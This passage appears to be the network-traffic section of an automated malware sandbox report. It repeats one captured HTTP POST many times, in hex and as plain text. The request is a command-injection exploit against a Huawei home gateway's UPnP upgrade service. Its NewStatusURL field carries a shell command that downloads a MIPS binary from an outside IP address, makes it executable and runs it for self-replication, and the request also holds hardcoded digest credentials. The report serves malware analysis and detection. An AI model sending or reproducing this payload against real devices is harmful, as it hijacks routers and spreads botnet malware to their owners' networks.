3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
